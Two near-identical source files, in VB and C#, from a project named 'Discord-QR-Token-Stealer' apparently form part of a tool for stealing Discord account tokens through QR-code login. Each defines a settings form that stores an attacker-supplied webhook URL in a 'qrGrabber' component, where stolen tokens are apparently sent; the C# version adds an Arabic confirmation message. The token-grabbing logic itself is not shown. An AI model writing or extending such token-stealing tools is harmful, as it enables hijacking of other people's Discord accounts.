File: SRC VB/Vb/Discord-QR-Token-Stealer/setHook.vb
Imports System
Imports System.Collections.Generic
Imports System.ComponentModel
Imports System.Data
Imports System.Drawing
Imports System.Linq
Imports System.Text
Imports System.Threading.Tasks
Imports System.Windows.Forms

Namespace Discord_QR_Token_Stealer
	Partial Public Class setHook
		Inherits Form

		Public Sub New()
			InitializeComponent()
		End Sub

		Private Sub set_Click(ByVal sender As Object, ByVal e As EventArgs) Handles set.Click
			' set the url and close
			qrGrabber.webhookUrl = hook.Text
			Close()
		End Sub
	End Class
End Namespace

File: Discord-QR-Token-Logger-master/Discord-QR-Token-Stealer/setHook.cs
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace Discord_QR_Token_Stealer
{
    public partial class setHook : Form
    {
        public setHook()
        {
            InitializeComponent();
        }

        private void set_Click(object sender, EventArgs e)
        {
            // set the url and close
            qrGrabber.webhookUrl = hook.Text;
            MessageBox.Show("تم وضع رابط الويب هوك استمتع");
            Close();
        }
    }
}
